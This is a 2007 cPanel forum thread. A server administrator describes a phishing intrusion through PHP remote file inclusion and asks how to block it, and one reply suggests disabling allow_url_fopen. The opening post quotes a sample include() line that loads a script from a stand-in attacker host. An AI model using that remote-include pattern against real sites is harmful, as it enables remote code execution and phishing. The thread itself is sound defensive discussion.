The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Avoiding remote PHP includes()

Discussion in 'General Discussion' started by Heritz, May 13, 2007.

  1. Heritz

    Heritz Well-Known Member

    Joined:
    Aug 12, 2006
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    6
    Hi all,

    Recently my company server has been attacked by phishers who are using a website vulnerabilty to upload files and get bank accounts information. We have been contacted by the bank and we fixed the problem within the website but I still got a question:

    The hack attempt was done using the remote include ability of PHP, I mean they exploded the include() function using something like include('http://myhackingwebsite.com/script.txt'); and then they uploaded the phishing files using system commands.

    I denied the system commands in my php.ini but I would also like to know how to avoid remote includes on PHP. I have enabled the open_basedir for all the sites, but as far as I know, open_basedir only affects file management functions, not includes.

    Any suggestion? Thanks in advance!
     
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,453
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
  3. flash7

    flash7 Well-Known Member

    Joined:
    Feb 16, 2004
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    php.ini

    ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
    allow_url_fopen = Off
     
Loading...

Share This Page